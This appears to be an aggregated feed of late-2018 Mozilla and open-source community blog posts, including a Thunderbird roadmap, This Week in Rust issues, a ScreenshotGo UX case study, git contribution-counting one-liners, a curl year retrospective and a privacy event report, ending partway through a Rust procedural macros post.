So here we are, in 2019. Looking into the future, this year looks bright for the Thunderbird project. As I pointed out earlier in this post, we start the new year with the hiring of some new staff to the Thunderbird team. Which will put us at as many as 14 full-time members on our staff. This opens up a world of possibilities for what we are able to accomplish, some of those goals I will detail now.

Making Thunderbird Fly Faster

Our hires are already addressing technical debt and doing a fair bit of plumbing when it comes to Thunderbird’s codebase. Our new hires will also be addressing UI-slowness and general performance issues across the application.

This is an area where I think we will see some of the best improvements in Thunderbird for 2019, as we look into methods for testing and measuring slowness – and then put our engineers on architecting solutions to these pain points. Beyond that, we will be looking into leveraging new, faster technologies in rewriting parts of Thunderbird as well as working toward a multi-process Thunderbird.

A More Beautiful (and Useable) Thunderbird

We have received considerable feedback asking for UX/UI improvements and, as teased above, we will work on this in 2019. With the addition of new developers we will see some focus on improving the experience for our users across the board in Thunderbird.

For instance, one area of usability that we are planning on addressing in 2019 is integration improvements in various areas. One of those is better GMail support; as one of the biggest Email providers, it makes sense to focus some resources on this area. We are looking at addressing GMail label support and ensuring that other features specific to the GMail experience translate well into Thunderbird.

We are looking at improving notifications in Thunderbird, by better integrating with each operating system’s built-in notification system. By working on this feature Thunderbird will feel more “native” on each desktop and will make managing notifications from the app easier.

The UX/UI around encryption and settings will get an overhaul in the coming year; whether or not all this work makes it into the next release is an open question, but as we grow our team this will be a focus. It is our hope to make encrypting Email and securing your private communication easier in upcoming releases; we’ve even hired an engineer who will be focused primarily on security and privacy. Beyond that, Thunderbird can do a lot, so we’ll be looking into improving the experience around settings so that it is easier to find and manage what you’re looking for.

So Much More

There are still a few things to work out for a 2019 roadmap. But if you’d like to see a technical overview of our plans, take a look at this post on the Thunderbird mailing list.

Support Thunderbird

If you are excited about the direction that Thunderbird is headed and would like to support the project, please consider becoming a donor to the project. We even have a newsletter that donors receive with news and updates about the project (and awesome Thunderbird art). You can even make a recurring monthly gift to Thunderbird, which is much appreciated. It’s the folks that have given of their time or donated that have made 2018 a success, and it’s your support that makes the future look bright for Thunderbird.


This Week In Rust: This Week in Rust 267

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is Dose Response, an online-playable roguelike game with a probably bleak outcome. Thanks to Vikrant Chaudhary for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

150 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

No RFCs are currently in final comment period.

New RFCs

There are currently no new RFCs

Upcoming Events

Online
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

In theory it would be entirely reasonable to guess that most Rust projects would need to use a significant amount of unsafe code to escape the limitations of the borrow checker. However, in practice it turns out (shockingly!) that the overwhelming majority of programs can be implemented perfectly well using only safe Rust.

– PM_ME_UR_MONADS on reddit

Thanks to nasa42 for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Patrick Cloke: Patching a Mail Slot

The front door of my condo has an unused mail slot in it (we have a mailbox on the front of the house to actually get mail). In order to avoid a draft during the winter, the previous owner had shoved some insulation in the mail slot and covered it …

Hacks.Mozilla.Org: Mozilla Hacks’ 10 most-read posts of 2018

Must be the season of the list—when we let the numbers reveal what they can about reader interests and attention over the past 360-some days of Mozilla Hacks.

Our top ten posts ranged across a variety of categories – including JavaScript and WebAssembly, CSS, the Web of Things, and Firefox Quantum. What else does the list tell us? People like code cartoons!

I should mention that the post on Mozilla Hacks that got the most traffic in 2018 was written in 2015. It’s called Iterators and the for-of loop, and was the second of seventeen articles in an amazing, evergreen series, ES6 In Depth, crafted and written in large part by Jason Orendorff, a JavaScript engineer.

Today’s list is focused on the year we’re about to put behind us, and only covers the posts written in calendar year 2018.

  1. Ben Francis kicked off Mozilla’s Project Things with this post about the potential and flexibility of WoT: How to build your own private smart home with a Raspberry Pi and Mozilla’s Things Gateway. It’s the opener of a multi-part hands-on series on the Web of Things, from Ben and team.
  2. Lin Clark delivered A cartoon intro to DNS over HTTPS in true-blue code cartoon style.
  3. In April, she gave a brilliant exposition of ES modules in ES modules: A cartoon deep-dive.
  4. WebAssembly has been a consistently hot topic on Hacks this year: Calls between JavaScript and WebAssembly are finally fast 🎉.
  5. Don’t underestimate the importance of WebAssembly for making the web viable and performant. As 2018 opened, Lin Clark illustrated its role in the browser: Making WebAssembly even faster: Firefox’s new streaming and tiering compiler.
  6. Research engineer Michael Bebenita shared a Sneak Peek at WebAssembly Studio, his interactive visualization of WebAssembly.
  7. Developer Advocate Josh Marinacci, who’s focused on sharing WebVR and Mozilla Mixed Reality with web developers, wrote a practical post about CSS Grid for UI Layouts—on how to improve your app layouts to respond and adapt to user interactions and changing conditions, and always have your panels scroll properly.
  8. As the year began to wind down, we got a closer look at how the best is yet to come for WebAssembly in WebAssembly’s post-MVP future: A cartoon skill tree from Lin Clark, Till Schneidereit, and Luke Wagner.
  9. Potch delivered his Hacks swan song as November drew to a close. The Power of Web Components was years in the making and well worth the wait.
  10. Mozilla Design Advocate and Layout Land creator Jen Simmons walked us through the ins and outs of resilient CSS in this seven-part video series you won’t want to miss: How to Write CSS That Works in Every Browser, Even the Old Ones.

Thanks for reading and sharing Mozilla Hacks in 2018. Here’s to 2019. There’s so much to do.

It’s always a good year to be learning. Want to keep up with Hacks? Follow @mozhacks on Twitter or subscribe to our always informative and unobtrusive weekly Mozilla Developer Newsletter below.

The post Mozilla Hacks’ 10 most-read posts of 2018 appeared first on Mozilla Hacks - the Web developer blog.

Andy McKay: 2019 Goals

My goal: I'm going to beat last years time of 4:19 and do the Whistler Gran Fondo in September 2019 in 4 hours.

That seems absurdly ridiculous on the face of it, but the fact that I was able to shave off 23 minutes this year was nothing short of miraculous to me. So let's try shaving off another 19 minutes. How am I going to do this?

  1. Get serious about losing weight again. I've done it in the past and then I revert. This year I'm aiming for a race weight of 160 lbs. In the past I've been around 180 lbs by the time I do the Gran Fondo.

  2. Improve my watts per kg. The amount of power you can output is important, so I've got to lose weight without losing muscle. I put out an estimated 236 W last Fondo; if I can do the same power output and weigh less, I'll improve my time (see the quick arithmetic below).
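Back-of-the-envelope (assuming the same 236 W and just converting pounds to kilograms), the watts per kg works out like this:

    # Rough watts-per-kg arithmetic, holding the 236 W constant.
    LBS_PER_KG = 2.20462

    for label, weight_lbs in (("~180 lbs (past Fondos)", 180), ("160 lbs target", 160)):
        watts_per_kg = 236 / (weight_lbs / LBS_PER_KG)
        print("%s: %.2f W/kg" % (label, watts_per_kg))
    # Roughly 2.9 W/kg at 180 lbs versus roughly 3.25 W/kg at 160 lbs for the same power.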

Actual things I'm going to do to meet these goals:

  1. Do a half marathon. I'm in the BMO Half in May. I've done 4 10k races so far and I found the last one a bit slow and painful. I need to get comfortable at doing 5k every day and a 10k regularly.

  2. Cycle regularly in the Steed group 2. That's a faster group than I normally ride in.

  3. Complete the Seymour Hill Climb in under 1 hour. My top time is 1:15:34 and according to Strava I'm 4924 / 6151. There's room for improvement there.

  4. Do lots of work at the gym to work on my core, leg and back muscles.

I can totally do this.

Disclaimer: I might just say screw it and not do this. It's my life.

Firefox UX: A bumpy road to Firefox ScreenshotGo in a foreign market

Back in January 2018, we were assigned to lead a project called New Product Exploration to help Mozilla grow impact on shopping experience in Southeast Asia, and the first stop was Indonesia, a country I had not visited and barely knew!

To quickly dive into the market and design a great product within six weeks, we adopted Lean UX thinking and continually fine-tuned the design process*, which proved successful on this journey. We also practiced the strategic approach Playing to Win** to fit the emerging market while staying aligned with the business model and goals. In short, we pushed forward and made discoveries through the following design process:

1. Explore & learn: discover and prioritize user needs on shopping demands
2. Assumptions to validate: create and validate preliminary assumptions
3. Design & build prototype: develop the prototype by collaborative design
4. Test & iterate: field research with users by prototype to iterate

<figcaption>Fine-tuned structure according to Lean UX process</figcaption>

Explore & learn
Though Indonesia is just a five-hour flight from Taiwan, I had little knowledge of its language, culture, values, etc. Fortunately, Ruby Hsu, our user researcher who had done extensive research and interviews in Indonesia, brought us solid observations and research findings as our starting point. Next, the team did extensive desk research to understand Indonesians' shopping behaviors. With the research findings, we depicted the shopping journey to explore the opportunities and pain points.

<figcaption>User journey is a sequence of events a user may take or interact with something to reach their goal</figcaption>

According to the shopping journey, we synthesized five general directions for further exploration:
- Price comparison
- Save to Wish list
- Save Money Helper
- Reviews
- Cash Flow Management

For each track, we validated assumptions with quantitative questionnaires via JakPat, a mobile survey service in Indonesia. Around 200 participants, all online shoppers, were recruited for each survey. The surveys gave us fundamental knowledge, covering everything from daily life to specific shopping behaviors, across genders, ages, monthly spending, and more. Surprisingly, the most significant pattern was that

screenshots always served as the dominant tool to fulfill most needs, like keeping wish lists, promotions, shopping history, and cash flows, which was well beyond our expectations.

Too much to do, but too little time. With so many different things going on, knowing how to prioritize effectively can be a real challenge. To help members from different disciplines become familiar with what we had learned, we held a workshop to develop the problem statement and a persona representing our research findings.

<figcaption>Persona is a representation of a type of target users</figcaption>

At the end of the workshop, the participants of the brainstorming session helped the team identify and assess risks and values as references to determine the exact location of each direction in the Risk/Value Matrix. “Save to wish list” was the one with the lowest risk but the highest value given the limited time and resources, which departs from the usual Lean UX logic.

<figcaption>Risk/Value Matrix prioritizes the potential ideas, which Lean UX believes the higher the risk and the more the value, the higher the priority is to test first</figcaption>

The team believed that creating a cross-channel wish list tool for online shoppers could be valuable since it could track original product information and discover the relevant items tailored to their taste.

Assumptions to validate

Having determined the direction, it was time to march forward. We invited representatives from all functional teams to create hypotheses and assumptions. The workshop consisted of four parts: business outcomes, users, user outcomes, and features. Finally, we mapped all the materials from those four aspects to create the feature hypotheses:

We believe this [business outcome] will be achieved if [these users] successfully achieve [this user outcome] with [this feature].
<figcaption>Cross-disciplinary workshop</figcaption>

Considering the persona, we prioritized and chose three hypotheses via the risk prioritization matrix. To speed up validation, we picked the three most essential ones, “universal wish list,” “organized wish list,” and “social wish list,” and developed surveys with storyboards to verify them.

<figcaption>Left to right: Universal wish list, Organized wish list, and Social wish list</figcaption>

The results revealed high demand for the first two ideas, while the last one required further validation of the potential need. Beyond our expectations once again, how Indonesians used screenshots was still the highlight of the survey results.

The screenshot was the existing, dominant tool they were already used to for capturing everything, well beyond shopping needs.

Design & build prototype

With all the validated assumptions, we decided to develop an app to help Indonesians make good use of screenshots as a quick, universal information manager across various online sources. Furthermore, they could get back to those online sources through the collected screenshots.

At that point, we had to make our ideas tangible for testing. After a collaborative workshop with engineers on the early design, and with continuous feasibility checks, I used Figma, a collaborative design tool, to quickly develop the fundamental information architecture and interaction details. By cooperating around the evolving UX wireframe, everyone could contribute their capabilities simultaneously.

<figcaption>Collaborated UX spec via Figma</figcaption>

While Fang Shih, the UI designer, was busy with designing the look and feel into the visual spec, Mark Liang, our prototyper, was coding the infrastructure and high fidelity prototype with Frammer. Last but not least, Ricky Yu, the user researcher, took care of the research plan, recruiting and testing schedule in Indonesia.

Test & Iterate

With everything prepared, we flew to Indonesia to meet real users and listen to their inner thoughts. The research trip consisted of three sections. Among the eight recruited participants, the first four were interviewed to validate the unmet needs, with particular focus on their screenshot behaviors and mental models. We then took one day to iterate on the design, and kept testing with the remaining participants for concept feedback on things like the IA and usability.

<figcaption>Overview of testing</figcaption>

Each participant went through various tasks, such as demoing their screenshots and prioritizing top features, to help us understand their feelings, thoughts, and behaviors. The entire research trip confirmed our observation about what screenshots mean to Indonesians:

“Almost everything I screenshot,” said one of our participants.

Shaping the product

As we analyzed the answers from the interviews, screenshot behaviors and pain points gradually emerged at each step of the screenshot process: triggering, storing, and retrieving.

Why did Indonesians like to screenshot?

Apps provided a better experience than websites, and some e-commerce apps even offered better prices. Screenshots were a quick and universal tool to grab information across apps. Besides, with unstable, slow, and limited data plans, users were more inclined to capture their online life in an offline screenshot instead of a hyperlink, which might take forever to load.

What pain points did Indonesians have in storing and retrieving?

Handy screenshots led to countless images in the Gallery, which made it hard for users to locate the screenshot they needed. Even when the screenshot was found, the static image did not provide any digital data for relevant actions on the smartphone; for instance, users had to memorize the info on the screenshot and search for the relevant content again.

In conclusion, for Indonesians screenshots could be defined as a universal offline tool for capturing information across various apps for further exploration online. However, they were looking for an app to readily find the needed screenshots among numerous images and to make good use of screenshots to explore related knowledge and content. The validated findings shaped the blueprint of Firefox ScreenshotGo — an Android app that helps Indonesians easily capture and manage screenshots and explore more relevant information.

As for how we measured the market size and launched the product, allow me to cover the details in another post.

<figcaption>Firefox ScreenshotGo is only available in Indonesia Google play store, but you can still install by following the instructions.</figcaption>

Why did Mozilla build Firefox ScreenshotGo?

It is a great question! Here I would like to briefly talk about how we adopted Playing to Win to arrive at the answer. The strategic narrative focused on fulfilling Mozilla's mission. Users screenshotted their online life across app silos that offered limited or manipulated information. Mozilla aimed to encourage users to go back to the open web and freely search for more linked content, using those screenshots as bookmarks.

<figcaption>Strategic narrative</figcaption>

*Lean UX process is a cycle of four actions, starting with “Research & learning”, “Outcomes, assumptions, hypotheses”, “Design it” and “Create an MVP.”
**Playing to Win provides a step-by-step framework to develop a strategy.


A bumpy road to Firefox ScreenshotGo in a foreign market was originally published in Firefox User Experience on Medium, where people are continuing the conversation by highlighting and responding to this story.

Shing Lyu: Counting your contribution to a git repository

Sometimes you may wonder: how many commits or lines of code did I contribute to a git repository? Here are some easy one-liners to help you count that.

Number of commits

Let’s start with the easy one: counting the number of commits made by one user.

The easiest way is to run

git shortlog -s

This gives you a list of commit counts by user:

2  Grant Lindberg
9  Jonathan Hao
2  Matias Kinnunen
65  Shing Lyu
4  Shou Ya
1  wildsky
1  wildskyf

(The example comes from shinglyu/QuantumVim.)

If you only care about one user you can use

git rev-list HEAD --author="Shing Lyu" --count 

, which prints 65.

Let’s explain how this works:

  • git rev-list HEAD will list the commit objects in HEAD
  • --author="Shing Lyu" will filter out only the commits made by the author Shing Lyu
  • --count counts the number of commits. You can pipe it to | wc -l instead.

Count the line of insertion and deletions by a user

Insertions and deletions are a little bit trickier. This is what I came up with:

git log --author=Shing --pretty=tformat: --numstat | grep -v '^-' | awk '{ add+=$1; remove+=$2 } END { print add, remove }' 

This might seem a little bit daunting, but we’ll break it up into steps:

  • git log --author="Shing Lyu" list the commits by Shing Lyu, in the following format:

    commit 6966b2c969cbf62029792221bf124ed75ee2c640
    Author: Shing Lyu <shing.lyu@gmail.com>
    Date:   Sat Nov 18 17:01:25 2017 +0100
    
        Added Ctrl+z to close all system tabs
    
    commit f4710cc3a2efdc63c7caf3ec04d504912ad20a93
    Author: Shing Lyu <shing.lyu@gmail.com>
    Date:   Sat Nov 18 15:58:20 2017 +0100
    
        Bump version and diable jpm packaging
    
  • --numstat will give us the line added and removed per file per commit:

    commit 6966b2c969cbf62029792221bf124ed75ee2c640
    Author: Shing Lyu <shing.lyu@gmail.com>
    Date:   Sat Nov 18 17:01:25 2017 +0100
    
        Added Ctrl+z to close all system tabs
    
        1       0       README.md
        10      0       manifest.json
        6       1       package.sh
        35      0       vim-background.js
        4       1       vim.js
    
    commit f4710cc3a2efdc63c7caf3ec04d504912ad20a93
    Author: Shing Lyu <shing.lyu@gmail.com>
    Date:   Sat Nov 18 15:58:20 2017 +0100
    
        Bump version and diable jpm packaging
    
        1       1       manifest.json
        3       3       package.sh
    
  • We don’t really need the commit, Author, Date and commit message fields, so we use an empty formatting string to get rid of them: --pretty=tformat:

    1       0       README.md
    10      0       manifest.json
    6       1       package.sh
    35      0       vim-background.js
    4       1       vim.js
    1       1       manifest.json
    3       3       package.sh
    
  • If you add some non-text files, e.g. png image files, the insertion/deletion count might be represented as - - foo.png. Therefore we filter them out with grep -v '^-'. If you are not familiar with grep, -v means inverse match (i.e. find the lines that do NOT match the pattern). The pattern ^- means lines starting with a -. (This part is optional if you pipe to awk; awk seems to ignore non-numeric characters while doing the math.)

  • Finally we pipe it to awk for summing. Even if you are not familiar with awk, this part is pretty self-explanatory:

    awk '{ add+=$1; remove+=$2 } END { print add, remove }'
    

    We add column one ($1) to the variable add, and column two ($2) to the variable remove, then we print them out. This gives us an output like so:

    936 260 
    

Other alternatives

There are many other off-the-shelf scripts that will help you calculate contribution statistics, like git-quick-stats, git-fame and git-fame-rb. But if you only want a quick-and-easy solution, please give these one-liners a try.

This Week In Rust: This Week in Rust 266

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is sandspiel, a WASM-powered online sandbox automaton game. Thanks to Vikrant Chaudhary for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

214 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Using (traits) for Inheritance was like putting car wheels on a boat because I am used to driving a vehicle with wheels.

– Marco Alka on Hashnode

Thanks to oberien for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

QMO: Firefox 65 Beta 6 Testday Results

Hello Mozillians!

As you may already know, last Friday, December 21st, we held a new Testday event for Firefox 65 Beta 6.

Thank you all for helping us make Mozilla a better place: priyadharshini A.

From the Bangladesh team: Sayed Ibn Masud, Osman Noyon, Alamin Shikder, Farhan Sadik Galib, Tanjia Akter Kona, Hossain Al Ikram, Basirul Fahad, Md. Majedul Islam, Sajedul Islam, Maruf Rahman and Forhad Hossain.
From the India team: Mohammed Adam and Adam24, Mohamed Bawas, Aishwarya Narasimhan@Aishwarya, Showkath begum.J and priyadharshini A.

Results:

– several test cases executed for the <notificationbox> & <notification> changes and Update Directory;
– bugs verified: 1501161, 1509277, 1511751, 1504268, 1501992, 1315509, 1510734, 1511954, 1509711, 1509889, 1511074, 1510734, 1506114, 1505801, 1450973, 1509889, 1511954, 1315509, 1501992, 1512047, 1237076;
– bugs confirmed: 1515995, 1515906;
– bug filled: 1516124;

Thanks for another successful testday! 🙂

Chris Peterson: Correlations Between Firefox Bug Severity and Priority

I was curious whether there were any correlations between Firefox bugs’ Priority and Severity values. My hypothesis was that:

  1. The Severity field would be rarely set to a non-default value. (Mozilla typically uses separate status flags to track blocking bugs and low Priority (P3-P5) for non-urgent issues.)
  2. Priority values would be correlated with Severity. (If a bug is severe, it will probably have a high priority.)

So are there any correlations between Severity and Priority values?

  1. The Severity field was rarely set to a non-default value: about 90% of triaged bugs had the default Severity (“Normal”), regardless of Priority. So Severity was not correlated with Priority.
  2. However, Priority was correlated with Severity: about 85% of triaged bugs with Severity “Blocker” had Priority P1. About 30-50% of bugs with other Severity values had Priority P3.

There are a lot of Firefox bugs in Bugzilla. To narrow the scope of my analysis, I selected bugs from the Firefox desktop product (Bugzilla Product “Firefox” or “Core”) that were filed and triaged within the last two years.

I ignored bugs filed more than two years ago because Mozilla’s use of the Priority field has changed over time. The last two years roughly cover the current era of bug triage and prioritization practices where Priority values have the following meaning:

  • P1 = Fix in the current release or iteration
  • P2 = Fix in the next release or iteration
  • P3 = Backlog
  • P4 = There is no P4. (This Priority is not supposed to be used, though it still is.)
  • P5 = “Patches accepted”

I ignored bugs with Priority “–” (the default, untriaged value) and P4 because these values are not set by triagers. P1 bugs may be overrepresented because, in theory, P2 bugs are not supposed to be fixed in the current release and should be elevated to P1 to be scheduled for fixing. I also ignored bugs that were resolved as Invalid, Duplicate, or Wontfix because they are unlikely to have accurate Priority or Severity values.
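As a rough sketch of the counting itself (assuming the triaged bugs have been exported to a CSV; the file name and column names below are placeholders, not a real Bugzilla export format), the two percentage breakdowns can be computed with a simple cross-tabulation:

    # Sketch: cross-tabulate Priority vs. Severity from an exported bug list.
    # "triaged_bugs.csv" and its column names are placeholders for illustration.
    import pandas as pd

    bugs = pd.read_csv("triaged_bugs.csv")  # assumed columns: priority, severity, resolution

    # Drop the values excluded from the analysis above.
    bugs = bugs[~bugs["priority"].isin(["--", "P4"])]
    bugs = bugs[~bugs["resolution"].isin(["INVALID", "DUPLICATE", "WONTFIX"])]

    # Share of each Severity within each Priority, and vice versa, as percentages.
    severity_by_priority = pd.crosstab(bugs["priority"], bugs["severity"],
                                       normalize="index") * 100
    priority_by_severity = pd.crosstab(bugs["severity"], bugs["priority"],
                                       normalize="index") * 100
    print(severity_by_priority.round(2))
    print(priority_by_severity.round(2))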

Distribution of Priority values:

  • 20.36% P1
  • 18.76% P2
  • 47.56% P3
  • 13.32% P5

Distribution of Severity values:

  • 0.15% Blocker
  • 5.53% Critical
  • 0.87% Major
  • 89.39% Normal (the default)
  • 0.87% Minor
  • 0.31% Trivial
  • 2.88% Enhancement

In conclusion, I propose that the Firefox Bugzilla not even show the Severity field. It’s not used to track which bugs block a given release or which bugs should be fixed first. For my raw bug data, see this spreadsheet.

Daniel Stenberg: A curl 2018 retrospective

Another year reaches its calendar end and a new year awaits around the corner. In the curl project we’ve had another busy and event-full year. Here’s a look back at some of the fun we’ve done during 2018.

Releases

We started out the year with the 7.58.0 release in January, and we managed to squeeze in another six releases during the year. In total we count 658 documented bug-fixes and 31 changes. The total number of bug-fixes was actually slightly lower this year compared to last year’s 683. An average of 1.8 bug-fixes per day is still not too shabby.

Authors

I’m very happy to say that we again managed to break our previous record as 155 unique authors contributed code. 111 of them for the first time in the project, and 126 did fewer than three commits during the year. Basically this means we merged code from a brand new author every three days through-out the year!

The list of “contributors”, where we also include helpers, bug reporters, security researchers, etc, increased by another 169 new names this year to a total of 1829 in the last release of the year. Of course we also got a lot of help from people who were already mentioned in there!

Will we be able to reach 2000 names before the end of 2019?

Commits

At the time of this writing, almost two weeks before the end of the year, we’re still behind the last few years with 1051 commits done this year. 1381 commits were done in 2017.

Daniel’s commit share

I personally authored 535 (50.9%) of all commits during 2018. Marcel Raad did 65 and Daniel Gustafsson 61. In general I maintain my general share of the changes done in the project over time. Possibly I’ve even increased it slightly the last few years. This graph shows my share of the commits layered on top of the number of commits done.

Vulnerabilities

This year we got exactly the same number of security problems reported as we did last year: 12. Some of the problems were one-offs due to curl being added to the OSS-Fuzz project in 2018; it has taken a while for the fuzzer to really hit some of our soft spots, and as we’ve seen a slow-down in reports from there, it’ll be interesting to see if 2019 will be a brighter year in this department. (In total, OSS-Fuzz is credited with having found six security vulnerabilities in curl to date.)

During the year we managed both to introduce a new bug bounty program and to retract that very same program when it shut down almost at once! 🙁

Lines of code

Counting all lines in the git repo in the src, lib and include directories, they grew nearly 6,000 lines (3.7%) during the year to 155,912. The primary code growing activities this year were:

  1. DNS-over-HTTPS support
  2. The new URL API and using that internally as well

Deprecating legacy

In July we created the DEPRECATE.md document to keep track of some things we’re stowing away in the cyberspace attic. During the year we cut off axTLS support as a first example of this deprecation procedure. HTTP pipelining, the global DNS cache and HTTP/0.9 accepted by default are the features next in line marked for removal, and the first two are already disabled in code.

curl up

We had our second curl conference this year, in Stockholm. It was a blast again and I’m already looking forward to curl up 2019 in Prague.

Sponsor updates

Yours truly quit Mozilla, and with that we lost them as a sponsor of the curl project. We have however gained several new backers and sponsors over the year since we joined opencollective, and we can receive donations from there.

Governance

Together with a bunch of core team members I put together a two-step proposal that I posted back in October:

  1. we join an umbrella organization
  2. we create a “board” to decide over money

As the first step has turned out to be a very slow operation (i.e. we’ve applied, but the process has not gone very far yet), we haven’t yet made step 2 happen either.

2019

Things that didn’t happen in 2018 but very well might happen in 2019 include:

  1. Some first HTTP/3 and QUIC code attempts in curl
  2. HSTS support? A pull request for this has been lingering for a while already.

Note: the numbers for 2018 in this post were extracted and graphs were prepared a few weeks before the actual end of year, so some of the data quite possibly changed a little bit since.

Ludovic Hirlimann: December 2018 - what extensions do I use in Firefox desktop

Here is the current list of extensions I have in my Firefox desktop nightly profile :

Firefox Multi-Account Containers

This lets me use Containers in a smoother fashion: it forces some domains to be opened in a particular type of container. For instance, Facebook is forced into my shopping container (and that's the only thing going into that container).

Grammalecte && Grammarly for Firefox

Because I'm so bad at spelling and grammar. These free tools help me with both French and English. I'd use Druide's Antidote if I weren't so cheap.

HTTPS everywhere

Less needed than a few years ago, it helps me secure my web exploration.

Mastodon Share

Because I use Mastodon as my preferred social network and Mastodon buttons are not always present on websites. I hope that with the demise of G+, G+ share buttons will be replaced with Mastodon ones.

Pinboard

Because I liked sharing and saving my bookmarks (delicio.us was a very nice social experience).

Security Report Card

Because I like to make the web more secure, and I can easily spot the rating when visiting a site. This lets me quickly decide whether or not to contact the site owner and let them know that their site could be configured better.

Universal Amazon Killer

So I don't have to search too much: I can use Amazon as a search engine and then shop locally.

Wayback machine

so I don't stumble too much on 404 :)

First Party Isolation

because I was too lazy to flip a preference.

Daniel Stenberg: HTTP/3 talk in Stockholm on January 22

HTTP/3 – the coming HTTP version

This time TCP is replaced by the new transport protocol QUIC, and things are different yet again! This is a presentation by Daniel Stenberg about HTTP/3 and QUIC, followed by a Q&A about everything HTTP.

The presentation will be done in English. It will be recorded and possibly live-streamed. Organized by me, together with our friends at goto10. It is free of charge, but you need to register.

When

17:30 – 19:00
January 22, 2019

Goto 10: Hörsalen, Hammarby Kaj 10D plan 5

Register here!

Fancy map to goto 10


Mozilla Open Policy & Advocacy Blog: Privacy in practice: Mozilla talks “lean data” in India

How can businesses best implement privacy principles? On November 26th, Mozilla hosted its first “Privacy Matters” event in New Delhi, bringing together representatives from some of India’s leading and upcoming online businesses. The session was aimed at driving a practical conversation around how companies can better protect user data, and the multiple incentives to do so.

This conversation is timely. The European GDPR came into force this May and had ripple effects on many Indian companies. India itself is well on its way to having its first comprehensive data protection law. We’ve been vocal in our support for a strong law, see here and here for our submissions to the Indian government. Conducted with Mika Shah, Lead Product and Data Counsel at Mozilla Headquarters in Mountain View, the meeting saw participation from thirteen companies in India, ranging from SMEs to large conglomerates, including Zomato, Ibibo, Dunzo, Practo and Zeotap. There was a mix of representatives across engineering, c-level, and legal/policy teams of these companies. The discussions were divided into three segments as per Mozilla’s Lean Data framework, covering key topics: “Engage users”, “Stay Lean”, and “Build-in Security”.

Engage Users

The first segment of the discussion focussed on how companies can better engage different audiences on issues of privacy. This ranges from making privacy policies more accessible and explaining data collection through “just-in-time” notifications, to better engaging investors and boards on privacy concerns to gain their support for implementing reforms. Many companies argued that providing more choices to the Indian user base throws up unique challenges, and that users can often be uninterested or careless when making choices about their personal data. This only reinforces the importance of user education, and companies agreed they could do more to effectively communicate about data collection, use, and sharing.

Stay lean

The second section was on the importance of staying “lean” with personal data rather than collecting, storing, and sharing indiscriminately. Most companies agreed that collecting and storing less personal data mitigates the risk of potential privacy leaks, breaches, and vulnerability to broad law enforcement requests. Staying lean does come with its own challenges, given that deleting data trails often comes at a high cost, or may be technically challenging when data has changed hands across vendors. It was agreed that there is a need for more innovative techniques to help pseudonymize or anonymize such datasets to reduce the risk of identification of end-users while maintaining the value of service. Despite these challenges, responsible companies should do their best to adhere to the principle of deleting data within their control, when no longer required.

Build-in security

The final segment covered key security features that could be built into the services. For many startups, the emphasis on security practices, especially relating to employee data access controls, has increased as they have grown in size. Participants in the event also spoke to concerns around the security practices of their vendors; these corporate partners often resist scrutiny of their security and/or are unwilling to negotiate terms, making it hard for companies to meet their obligations to their users and under the law.

Following the event, all of the participants confirmed that they’re intending to make changes to their privacy practices. It’s great to see such enthusiasm and commitment to protecting user privacy and championing these issues within their respective companies. We look forward to hosting further iterations of this event in India. For more information about the Lean Data Practices, see: https://www.leandatapractices.com/

 

The post Privacy in practice: Mozilla talks “lean data” in India appeared first on Open Policy & Advocacy.

The Rust Programming Language BlogProcedural Macros in Rust 2018

Perhaps my favorite feature in the Rust 2018 edition is procedural macros. Procedural macros have had a long and storied history in Rust (and will continue to have a storied future!), and now is perhaps one of the best times to get involved with them because the 2018 edition has so dramatically improved the experience of both defining and using them.

Here I'd like to explore what procedural macros are, what they're capable of, notable new features, and some fun use cases of procedural macros. I might even convince you that this is Rust 2018's best feature as well!

What is a procedural macro?

First defined over two years ago in RFC 1566, a procedural macro is, in layman's terms, a function that takes a piece of syntax at compile time and produces a new bit of syntax. Procedural macros in Rust 2018 come in one of three flavors:

